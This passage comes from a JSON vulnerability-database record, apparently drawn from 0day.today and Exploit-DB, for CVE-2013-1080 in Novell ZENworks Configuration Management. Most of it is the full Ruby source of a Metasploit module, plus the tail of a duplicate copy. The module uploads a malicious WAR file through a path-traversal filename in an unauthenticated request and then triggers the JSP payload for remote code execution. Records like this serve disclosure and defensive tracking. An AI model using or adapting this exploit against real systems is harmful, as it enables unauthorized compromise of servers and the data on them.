rand_text_alphanumeric(4+rand(4))\r\n jsp_name = rand_text_alphanumeric(8+rand(8))\r\n\r\n war_data = payload.encoded_war(:app_name => app_base, :jsp_name => jsp_name).to_s\r\n\r\n print_status(\"Uploading #{war_data.length} bytes as #{app_base}.war ...\")\r\n\r\n # Rex::MIME::Message.new doesn't work fine with binary data, destroys \"\\x0d\" chars\r\n boundary = \"----#{rand_text_alpha(34)}\"\r\n data = \"--#{boundary}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"mainPage:_ctrl21a:FindFile:filePathTextBox\\\"; filename=\\\"#{target['Traversal']}#{app_base}.war\\\"\\r\\n\"\r\n data << \"Content-Type: application/octet-stream\\r\\n\\r\\n\"\r\n data << war_data\r\n data << \"\\r\\n\"\r\n data << \"--#{boundary}--\"\r\n\r\n res = send_request_cgi(\r\n {\r\n 'method' => 'POST',\r\n 'uri' => \"/zenworks/jsp/index.jsp?pageid=newDocumentWizard\",\r\n 'ctype' => \"multipart/form-data; boundary=#{boundary}\",\r\n 'data' => data\r\n })\r\n\r\n if res and res.code == 302\r\n print_status(\"Upload finished, waiting 20 seconds for payload deployment...\")\r\n else\r\n fail_with(Exploit::Failure::Unknown, \"Failed to upload payload\")\r\n end\r\n\r\n # Wait to ensure the uploaded war is deployed\r\n select(nil, nil, nil, 20)\r\n\r\n print_status(\"Triggering payload at '/#{app_base}/#{jsp_name}.jsp' ...\")\r\n send_request_cgi({\r\n 'uri' => normalize_uri(app_base, \"#{jsp_name}.jsp\"),\r\n 'method' => 'GET',\r\n })\r\n end\r\n\r\nend\n\n# 0day.today [2018-04-09] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/20599"}], "exploitdb": [{"lastseen": "2016-02-03T00:18:53", "bulletinFamily": "exploit", "description": "Novell ZENworks Configuration Management Remote Execution. CVE-2013-1080. Remote exploits for multiple platform", "modified": "2013-04-08T00:00:00", "published": "2013-04-08T00:00:00", "id": "EDB-ID:24938", "href": "https://www.exploit-db.com/exploits/24938/", "type": "exploitdb", "title": "Novell ZENworks Configuration Management Remote Execution", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = GreatRanking\r\n\r\n HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::EXE\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Novell ZENworks Configuration Management Remote Execution',\r\n 'Description' => %q{\r\n This module exploits a code execution flaw in Novell ZENworks Configuration\r\n Management 10 SP3 and 11 SP2. The vulnerability exists in the ZEnworks Control\r\n Center application, allowing an unauthenticated attacker to upload a malicious file\r\n outside of the TEMP directory and then make a second request that allows for\r\n arbitrary code execution. This module has been tested successfully on Novell\r\n ZENworks Configuration Management 10 SP3 and 11 SP2 on Windows 2003 SP2 and SUSE\r\n Linux Enterprise Server 10 SP3.\r\n },\r\n 'Author' =>\r\n [\r\n 'James Burton', # Vulnerability discovery\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-1080' ],\r\n [ 'BID', '58668' ],\r\n [ 'OSVDB', '91627' ],\r\n [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-049/' ],\r\n [ 'URL', 'http://www.novell.com/support/kb/doc.php?id=7011812' ]\r\n ],\r\n 'Privileged' => false,\r\n 'Platform' => [ 'win', 'linux' ],\r\n 'Targets' =>\r\n [\r\n [ 'ZENworks Configuration Management 10 SP3 and 11 SP2 / Windows 2003 SP2',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'win',\r\n 'Traversal' => '../webapps/'\r\n }\r\n ],\r\n [ 'ZENworks Configuration Management 10 SP3 and 11 SP2 / SUSE Linux Enterprise Server 10 SP3',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'linux',\r\n 'Traversal' => '../../opt/novell/zenworks/share/tomcat/webapps/'\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 1,\r\n 'DisclosureDate' => 'Mar 22 2013'))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(443),\r\n OptBool.new('SSL', [true, 'Use SSL', true])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => \"/zenworks/jsp/fw/internal/Login.jsp\"\r\n })\r\n\r\n if res and res.code == 200 and res.body =~ /Novell ZENworks Control Center/\r\n return Exploit::CheckCode::Detected\r\n end\r\n\r\n return Exploit::CheckCode::Detected\r\n end\r\n\r\n def exploit\r\n\r\n # Generate the WAR containing the EXE containing the payload\r\n app_base = rand_text_alphanumeric(4+rand(4))\r\n jsp_name = rand_text_alphanumeric(8+rand(8))\r\n\r\n war_data = payload.encoded_war(:app_name => app_base, :jsp_name => jsp_name).to_s\r\n\r\n print_status(\"Uploading #{war_data.length} bytes as #{app_base}.war ...\")\r\n\r\n # Rex::MIME::Message.new doesn't work fine with binary data, destroys \"\\x0d\" chars\r\n boundary = \"----#{rand_text_alpha(34)}\"\r\n data = \"--#{boundary}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"mainPage:_ctrl21a:FindFile:filePathTextBox\\\"; filename=\\\"#{target['Traversal']}#{app_base}.war\\\"\\r\\n\"\r\n data << \"Content-Type: application/octet-stream\\r\\n\\r\\n\"\r\n data << war_data\r\n data << \"\\r\\n\"\r\n data << \"--#{boundary}--\"\r\n\r\n res = send_request_cgi(\r\n {\r\n 'method' => 'POST',\r\n 'uri' => \"/zenworks/jsp/index.jsp?pageid=newDocumentWizard\",\r\n 'ctype' => \"multipart/form-data; boundary=#{boundary}\",\r\n 'data' => data\r\n })\r\n\r\n if res and res.code == 302\r\n print_status(\"Upload finished, waiting 20 seconds for payload deployment...\")\r\n else\r\n fail_with(Exploit::Failure::Unknown, \"Failed to upload payload\")\r\n end\r\n\r\n # Wait to ensure the uploaded war is deployed\r\n select(nil, nil, nil, 20)\r\n\r\n print_status(\"Triggering payload at '/#{app_base}/#{jsp_name}.jsp' ...\")\r\n send_request_cgi({\r\n 'uri' => normalize_uri(app_base, \"#{jsp_name}.jsp\"),\r\n 'method' => 'GET',\r\n })\r\n end\r\n\r\nend", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/24938/"}]}